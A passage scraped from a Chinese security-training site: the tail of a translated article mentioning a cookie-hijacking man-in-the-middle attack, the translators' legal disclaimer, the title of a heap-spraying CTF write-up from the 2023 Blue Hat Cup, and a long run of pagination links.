cookie 劫持触发的中间人 (MitM) 攻击。免责声明以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

从2023蓝帽杯0解题heapSpary入门堆喷

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页第62页第63页第64页第65页第66页第67页第68页第69页第70页第71页第72页第73页第74页第75页第76页第77页第78页第79页第80页第81页第82页第83页第84页第85页第86页第87页第88页第89页第90页第91页第92页第93页第94页第95页第96页第97页第98页第99页第100页第101页第102页第103页第104页第105页第106页第107页第108页第109页第110页第111页第112页第113页第114页第115页第116页第117页第118页第119页第120页第121页第122页第123页第124页第125页第126页第127页第128页第129页第130页第131页第132页第133页第134页第135页第136页第137页第138页第139页第140页第141页第142页第143页第144页第145页第146页第147页第148页第149页第150页第151页第152页第153页第154页第155页第156页第157页第158页第159页第160页第161页第162页第163页第164页第165页第166页第167页第168页第169页第170页第171页第172页第173页第174页第175页第176页第177页第178页第179页第180页第181页第182页第183页第184页第185页第186页第187页第188页第189页第190页第191页第192页第193页第194页第195页第196页第197页第198页第199页第200页第201页第202页第203页第204页第205页第206页第207页